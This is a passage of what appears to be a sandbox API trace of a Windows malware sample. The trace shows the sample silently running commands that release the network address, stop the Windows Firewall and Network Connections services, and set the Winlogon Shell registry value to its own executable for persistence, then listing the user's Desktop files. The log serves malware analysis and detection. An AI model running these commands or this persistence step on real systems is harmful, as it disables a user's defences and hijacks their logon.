lpVerb=0x0, lpFile="cmd.exe", lpParameters="/C ipconfig /release", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x484)) returned 1 [0278.448] LocalFree (hMem=0x751218) returned 0x0 [0278.448] LocalFree (hMem=0x75e5d0) returned 0x0 [0278.448] GetCurrentProcess () returned 0xffffffff [0278.448] GetCurrentProcess () returned 0xffffffff [0278.448] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x484, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1af19c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1af19c*=0x45c) returned 1 [0278.449] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1af194*=0x45c, lpdwindex=0x1aefb4 | out: lpdwindex=0x1aefb4) returned 0x0 [0291.971] CloseHandle (hObject=0x45c) returned 1 [0291.971] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x751218 [0291.971] LocalAlloc (uFlags=0x0, uBytes=0x3a) returned 0x75b7d8 [0291.971] ShellExecuteExW (in: pExecInfo=0x2148d48*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="cmd.exe", lpParameters="/C net stop Windows Firewall", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2148d48*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="cmd.exe", lpParameters="/C net stop Windows Firewall", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x488)) returned 1 [0292.002] LocalFree (hMem=0x751218) returned 0x0 [0292.003] LocalFree (hMem=0x75b7d8) returned 0x0 [0292.003] GetCurrentProcess () returned 0xffffffff [0292.003] GetCurrentProcess () returned 0xffffffff [0292.003] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x488, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1af19c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1af19c*=0x354) returned 1 [0292.003] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1af194*=0x354, lpdwindex=0x1aefb4 | out: lpdwindex=0x1aefb4) returned 0x0 [0296.196] CloseHandle (hObject=0x354) returned 1 [0296.199] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x751218 [0296.199] LocalAlloc (uFlags=0x0, uBytes=0x40) returned 0x75bc58 [0296.199] ShellExecuteExW (in: pExecInfo=0x2148f34*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="cmd.exe", lpParameters="/C net stop Network Connections", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2148f34*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="cmd.exe", lpParameters="/C net stop Network Connections", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x48c)) returned 1 [0296.260] LocalFree (hMem=0x751218) returned 0x0 [0296.260] LocalFree (hMem=0x75bc58) returned 0x0 [0296.261] GetCurrentProcess () returned 0xffffffff [0296.261] GetCurrentProcess () returned 0xffffffff [0296.261] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x48c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1af19c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1af19c*=0x444) returned 1 [0296.261] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1af194*=0x444, lpdwindex=0x1aefb4 | out: lpdwindex=0x1aefb4) returned 0x0 [0297.792] CloseHandle (hObject=0x444) returned 1 [0298.003] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", ulOptions=0x0, samDesired=0x2001f, phkResult=0x1af1c0 | out: phkResult=0x1af1c0*=0x444) returned 0x0 [0298.030] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe", nBufferLength=0x105, lpBuffer=0x1aecc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe", lpFilePart=0x0) returned 0x62 [0298.031] RegQueryValueExW (in: hKey=0x444, lpValueName="Shell", lpReserved=0x0, lpType=0x1af218, lpData=0x0, lpcbData=0x1af214*=0x0 | out: lpType=0x1af218*=0x1, lpData=0x0, lpcbData=0x1af214*=0x1a) returned 0x0 [0298.032] RegSetValueExW (in: hKey=0x444, lpValueName="Shell", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe", cbData=0xc6 | out: lpData="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe") returned 0x0 [0298.033] RegCloseKey (hKey=0x444) returned 0x0 [0298.033] CoTaskMemAlloc (cb=0x20c) returned 0x6c7110 [0298.034] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x6c7110 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x0 [0298.034] CoTaskMemFree (pv=0x6c7110) [0298.034] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x0) returned 0x1d [0298.034] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af218) returned 1 [0298.035] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x105, lpBuffer=0x1aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x0) returned 0x1d [0298.035] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", nBufferLength=0x105, lpBuffer=0x1aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpFilePart=0x0) returned 0x1e [0298.035] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*", lpFindFileData=0x1aef40 | out: lpFindFileData=0x1aef40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xd71272d6, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xd71272d6, ftLastWriteTime.dwHighDateTime=0x1d8224f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0298.036] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xd71272d6, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xd71272d6, ftLastWriteTime.dwHighDateTime=0x1d8224f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0298.036] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea1dfe10, ftCreationTime.dwHighDateTime=0x1d7d73d, ftLastAccessTime.dwLowDateTime=0x590d3ff0, ftLastAccessTime.dwHighDateTime=0x1d7de66, ftLastWriteTime.dwLowDateTime=0x590d3ff0, ftLastWriteTime.dwHighDateTime=0x1d7de66, nFileSizeHigh=0x0, nFileSizeLow=0x16800, dwReserved0=0x0, dwReserved1=0x0, cFileName="0aih45hu.jpg", cAlternateFileName="")) returned 1 [0298.036] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1866520, ftCreationTime.dwHighDateTime=0x1d7df30, ftLastAccessTime.dwLowDateTime=0xd42ebbb0, ftLastAccessTime.dwHighDateTime=0x1d7e5db, ftLastWriteTime.dwLowDateTime=0xd42ebbb0, ftLastWriteTime.dwHighDateTime=0x1d7e5db, nFileSizeHigh=0x0, nFileSizeLow=0x7511, dwReserved0=0x0, dwReserved1=0x0, cFileName="4-0bKIu_zvUdt.mkv", cAlternateFileName="4-0BKI~1.MKV")) returned 1 [0298.036] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e0d6f00, ftCreationTime.dwHighDateTime=0x1d8224f, ftLastAccessTime.dwLowDateTime=0x7ea60580, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xdac2100, ftLastWriteTime.dwHighDateTime=0x1d82242, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe", cAlternateFileName="69811A~1.EXE")) returned 1 [0298.036] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd71272d6, ftCreationTime.dwHighDateTime=0x1d8224f, ftLastAccessTime.dwLowDateTime=0xd71272d6, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xd8250b16, ftLastWriteTime.dwHighDateTime=0x1d8224f, nFileSizeHigh=0x0, nFileSizeLow=0x41, dwReserved0=0x0, dwReserved1=0x0, cFileName="autorun.inf", cAlternateFileName="")) returned 1 [0298.037] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef57e570, ftCreationTime.dwHighDateTime=0x1d7dc48, ftLastAccessTime.dwLowDateTime=0x952e9530, ftLastAccessTime.dwHighDateTime=0x1d7e22e, ftLastWriteTime.dwLowDateTime=0x952e9530, ftLastWriteTime.dwHighDateTime=0x1d7e22e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BGQh9XM98-F_E sIj", cAlternateFileName="BGQH9X~1")) returned 1 [0298.037] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e9a4740, ftCreationTime.dwHighDateTime=0x1d7e276, ftLastAccessTime.dwLowDateTime=0x19402410, ftLastAccessTime.dwHighDateTime=0x1d7e54f, ftLastWriteTime.dwLowDateTime=0x19402410, ftLastWriteTime.dwHighDateTime=0x1d7e54f, nFileSizeHigh=0x0, nFileSizeLow=0x12fb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="csI0 APq22kpFx84um.doc", cAlternateFileName="CSI0AP~1.DOC")) returned 1 [0298.037] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63934470, ftCreationTime.dwHighDateTime=0x1d7e419, ftLastAccessTime.dwLowDateTime=0xbc7be2f0, ftLastAccessTime.dwHighDateTime=0x1d7e4b8, ftLastWriteTime.dwLowDateTime=0xbc7be2f0, ftLastWriteTime.dwHighDateTime=0x1d7e4b8, nFileSizeHigh=0x0, nFileSizeLow=0xa1bd, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cx4Ag.doc", cAlternateFileName="")) returned 1 [0298.037] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cfa0da0, ftCreationTime.dwHighDateTime=0x1d7d73f, ftLastAccessTime.dwLowDateTime=0x2ce7c810, ftLastAccessTime.dwHighDateTime=0x1d7e662, ftLastWriteTime.dwLowDateTime=0x2ce7c810, ftLastWriteTime.dwHighDateTime=0x1d7e662, nFileSizeHigh=0x0, nFileSizeLow=0x16df9, dwReserved0=0x0, dwReserved1=0x0, cFileName="d-a24dz0snVX.xlsx", cAlternateFileName="D-A24D~1.XLS")) returned 1 [0298.037] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0298.038] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc54fb7f0, ftCreationTime.dwHighDateTime=0x1d7db33, ftLastAccessTime.dwLowDateTime=0x305a1bd0, ftLastAccessTime.dwHighDateTime=0x1d7dea9, ftLastWriteTime.dwLowDateTime=0x305a1bd0, ftLastWriteTime.dwHighDateTime=0x1d7dea9, nFileSizeHigh=0x0, nFileSizeLow=0xed9a, dwReserved0=0x0, dwReserved1=0x0, cFileName="G2jIFnab-iHgfnotUdc.wav", cAlternateFileName="G2JIFN~1.WAV")) returned 1 [0298.038] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8e1e30, ftCreationTime.dwHighDateTime=0x1d7da06, ftLastAccessTime.dwLowDateTime=0xd8e93720, ftLastAccessTime.dwHighDateTime=0x1d7dbc2, ftLastWriteTime.dwLowDateTime=0xd8e93720, ftLastWriteTime.dwHighDateTime=0x1d7dbc2, nFileSizeHigh=0x0, nFileSizeLow=0x9ada, dwReserved0=0x0, dwReserved1=0x0, cFileName="h aXUsMO6g.png", cAlternateFileName="HAXUSM~1.PNG")) returned 1 [0298.038] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa1e1c40, ftCreationTime.dwHighDateTime=0x1d7db21, ftLastAccessTime.dwLowDateTime=0x26937cb0, ftLastAccessTime.dwHighDateTime=0x1d7e22b, ftLastWriteTime.dwLowDateTime=0x26937cb0, ftLastWriteTime.dwHighDateTime=0x1d7e22b, nFileSizeHigh=0x0, nFileSizeLow=0x142c7, dwReserved0=0x0, dwReserved1=0x0, cFileName="HElJnZ.bmp", cAlternateFileName="")) returned 1 [0298.038] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf92f00f0, ftCreationTime.dwHighDateTime=0x1d7e70c, ftLastAccessTime.dwLowDateTime=0x48586ac0, ftLastAccessTime.dwHighDateTime=0x1d7e746, ftLastWriteTime.dwLowDateTime=0x48586ac0, ftLastWriteTime.dwHighDateTime=0x1d7e746, nFileSizeHigh=0x0, nFileSizeLow=0x12ecf, dwReserved0=0x0, dwReserved1=0x0, cFileName="HhodZgzF8 9dLBFX.avi", cAlternateFileName="HHODZG~1.AVI")) returned 1 [0298.039] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb899930, ftCreationTime.dwHighDateTime=0x1d7e3df, ftLastAccessTime.dwLowDateTime=0x1bc21a10, ftLastAccessTime.dwHighDateTime=0x1d7e449, ftLastWriteTime.dwLowDateTime=0x1bc21a10, ftLastWriteTime.dwHighDateTime=0x1d7e449, nFileSizeHigh=0x0, nFileSizeLow=0x4a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="iWyhboFMJLgPq_b7Ud9.avi", cAlternateFileName="IWYHBO~1.AVI")) returned 1 [0298.039] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57d4eab0, ftCreationTime.dwHighDateTime=0x1d7dd2c, ftLastAccessTime.dwLowDateTime=0x4f0c7a00, ftLastAccessTime.dwHighDateTime=0x1d7e6f6, ftLastWriteTime.dwLowDateTime=0x4f0c7a00, ftLastWriteTime.dwHighDateTime=0x1d7e6f6, nFileSizeHigh=0x0, nFileSizeLow=0x1787d, dwReserved0=0x0, dwReserved1=0x0, cFileName="IZrQfjN.m4a", cAlternateFileName="")) returned 1 [0298.039] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b6ddf0, ftCreationTime.dwHighDateTime=0x1d7e686, ftLastAccessTime.dwLowDateTime=0xdda50770, ftLastAccessTime.dwHighDateTime=0x1d7e6b8, ftLastWriteTime.dwLowDateTime=0xdda50770, ftLastWriteTime.dwHighDateTime=0x1d7e6b8, nFileSizeHigh=0x0, nFileSizeLow=0x4e4f, dwReserved0=0x0, dwReserved1=0x0, cFileName="L0Cw.docx", cAlternateFileName="L0CW~1.DOC")) returned 1 [0298.039] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc60d2b20, ftCreationTime.dwHighDateTime=0x1d7e13f, ftLastAccessTime.dwLowDateTime=0x634edb40, ftLastAccessTime.dwHighDateTime=0x1d7e6f4, ftLastWriteTime.dwLowDateTime=0x634edb40, ftLastWriteTime.dwHighDateTime=0x1d7e6f4, nFileSizeHigh=0x0, nFileSizeLow=0x6057, dwReserved0=0x0, dwReserved1=0x0, cFileName="L3CXAN4c0b0rw2-.mkv", cAlternateFileName="L3CXAN~1.MKV")) returned 1 [0298.039] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc396f90, ftCreationTime.dwHighDateTime=0x1d7dc64, ftLastAccessTime.dwLowDateTime=0xb8ec5480, ftLastAccessTime.dwHighDateTime=0x1d7de1e, ftLastWriteTime.dwLowDateTime=0xb8ec5480, ftLastWriteTime.dwHighDateTime=0x1d7de1e, nFileSizeHigh=0x0, nFileSizeLow=0x13cbe, dwReserved0=0x0, dwReserved1=0x0, cFileName="L_wFYu3lS.pptx", cAlternateFileName="L_WFYU~1.PPT")) returned 1 [0298.039] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8559540, ftCreationTime.dwHighDateTime=0x1d7e270, ftLastAccessTime.dwLowDateTime=0xeb453af0, ftLastAccessTime.dwHighDateTime=0x1d7e6de, ftLastWriteTime.dwLowDateTime=0xeb453af0, ftLastWriteTime.dwHighDateTime=0x1d7e6de, nFileSizeHigh=0x0, nFileSizeLow=0xeb56, dwReserved0=0x0, dwReserved1=0x0, cFileName="MyZQDkF.mp3", cAlternateFileName="")) returned 1 [0298.040] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x359a59a0, ftCreationTime.dwHighDateTime=0x1d7e455, ftLastAccessTime.dwLowDateTime=0x775764e0, ftLastAccessTime.dwHighDateTime=0x1d7e64f, ftLastWriteTime.dwLowDateTime=0x775764e0, ftLastWriteTime.dwHighDateTime=0x1d7e64f, nFileSizeHigh=0x0, nFileSizeLow=0x16292, dwReserved0=0x0, dwReserved1=0x0, cFileName="nRKT5nI-9Sno8sTzM1P5.wav", cAlternateFileName="NRKT5N~1.WAV")) returned 1 [0298.040] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbc8d580, ftCreationTime.dwHighDateTime=0x1d7e6fb, ftLastAccessTime.dwLowDateTime=0xbdec11f0, ftLastAccessTime.dwHighDateTime=0x1d7e76f, ftLastWriteTime.dwLowDateTime=0xbdec11f0, ftLastWriteTime.dwHighDateTime=0x1d7e76f, nFileSizeHigh=0x0, nFileSizeLow=0x3621, dwReserved0=0x0, dwReserved1=0x0, cFileName="OqWYTp.bmp", cAlternateFileName="")) returned 1 [0298.040] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd362020, ftCreationTime.dwHighDateTime=0x1d7e754, ftLastAccessTime.dwLowDateTime=0x709af980, ftLastAccessTime.dwHighDateTime=0x1d7e755, ftLastWriteTime.dwLowDateTime=0x709af980, ftLastWriteTime.dwHighDateTime=0x1d7e755, nFileSizeHigh=0x0, nFileSizeLow=0x1520, dwReserved0=0x0, dwReserved1=0x0, cFileName="SkBr_ODTO7.ppt", cAlternateFileName="SKBR_O~1.PPT")) returned 1 [0298.040] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28b5bac0, ftCreationTime.dwHighDateTime=0x1d7d746, ftLastAccessTime.dwLowDateTime=0xc3fc26e0, ftLastAccessTime.dwHighDateTime=0x1d7de49, ftLastWriteTime.dwLowDateTime=0xc3fc26e0, ftLastWriteTime.dwHighDateTime=0x1d7de49, nFileSizeHigh=0x0, nFileSizeLow=0xe2c6, dwReserved0=0x0, dwReserved1=0x0, cFileName="SoNi.jpg", cAlternateFileName="")) returned 1 [0298.040] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f9514b0, ftCreationTime.dwHighDateTime=0x1d7e727, ftLastAccessTime.dwLowDateTime=0xa82e8ec0, ftLastAccessTime.dwHighDateTime=0x1d7e737, ftLastWriteTime.dwLowDateTime=0xa82e8ec0, ftLastWriteTime.dwHighDateTime=0x1d7e737, nFileSizeHigh=0x0, nFileSizeLow=0x114f9, dwReserved0=0x0, dwReserved1=0x0, cFileName="sTLRgmy.flv", cAlternateFileName="")) returned 1 [0298.040] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbdf3170, ftCreationTime.dwHighDateTime=0x1d7d9ba, ftLastAccessTime.dwLowDateTime=0x61bc6a40, ftLastAccessTime.dwHighDateTime=0x1d7e037, ftLastWriteTime.dwLowDateTime=0x61bc6a40, ftLastWriteTime.dwHighDateTime=0x1d7e037, nFileSizeHigh=0x0, nFileSizeLow=0x18100, dwReserved0=0x0, dwReserved1=0x0, cFileName="tmhBBPCr.mp4", cAlternateFileName="")) returned 1 [0298.041] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd81ccee0, ftCreationTime.dwHighDateTime=0x1d7e3a3, ftLastAccessTime.dwLowDateTime=0xbe248520, ftLastAccessTime.dwHighDateTime=0x1d7e450, ftLastWriteTime.dwLowDateTime=0xbe248520, ftLastWriteTime.dwHighDateTime=0x1d7e450, nFileSizeHigh=0x0, nFileSizeLow=0xebfc, dwReserved0=0x0, dwReserved1=0x0, cFileName="TujlyxlbhAxVP9v1.mp4", cAlternateFileName="TUJLYX~1.MP4")) returned 1 [0298.041] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75e0bb40, ftCreationTime.dwHighDateTime=0x1d7d829, ftLastAccessTime.dwLowDateTime=0x603800f0, ftLastAccessTime.dwHighDateTime=0x1d7dcc5, ftLastWriteTime.dwLowDateTime=0x603800f0, ftLastWriteTime.dwHighDateTime=0x1d7dcc5, nFileSizeHigh=0x0, nFileSizeLow=0x43c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="V0zO8w_tvkIQjvRX6KqC.jpg", cAlternateFileName="V0ZO8W~1.JPG")) returned 1 [0298.041] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63377cb0, ftCreationTime.dwHighDateTime=0x1d7e254, ftLastAccessTime.dwLowDateTime=0xea3dd620, ftLastAccessTime.dwHighDateTime=0x1d7e3f6, ftLastWriteTime.dwLowDateTime=0xea3dd620, ftLastWriteTime.dwHighDateTime=0x1d7e3f6, nFileSizeHigh=0x0, nFileSizeLow=0x2061, dwReserved0=0x0, dwReserved1=0x0, cFileName="VL-8wX.png", cAlternateFileName="")) returned 1 [0298.041] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d08e860, ftCreationTime.dwHighDateTime=0x1d7df82, ftLastAccessTime.dwLowDateTime=0x8ba89350, ftLastAccessTime.dwHighDateTime=0x1d7e736, ftLastWriteTime.dwLowDateTime=0x8ba89350, ftLastWriteTime.dwHighDateTime=0x1d7e736, nFileSizeHigh=0x0, nFileSizeLow=0x887b, dwReserved0=0x0, dwReserved1=0x0, cFileName="WJV4 Vo51_-ctoxSde.gif", cAlternateFileName="WJV4VO~1.GIF")) returned 1 [0298.041] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x577e7830, ftCreationTime.dwHighDateTime=0x1d7e47d, ftLastAccessTime.dwLowDateTime=0x87fef250, ftLastAccessTime.dwHighDateTime=0x1d7e630, ftLastWriteTime.dwLowDateTime=0x87fef250, ftLastWriteTime.dwHighDateTime=0x1d7e630, nFileSizeHigh=0x0, nFileSizeLow=0x1365f, dwReserved0=0x0, dwReserved1=0x0, cFileName="y4hqqhoePb18-mRGw.pdf", cAlternateFileName="Y4HQQH~1.PDF")) returned 1 [0298.042] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0298.042] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0298.042] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af1d8) returned 1 [0298.042] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af1e4) returned 1 [0298.042] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af218) returned 1 [0298.043] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x105, lpBuffer=0x1aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x0) returned 0x1d [0298.043] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", nBufferLength=0x105, lpBuffer=0x1aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpFilePart=0x0) returned 0x1e [0298.043] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*", lpFindFileData=0x1aef40 | 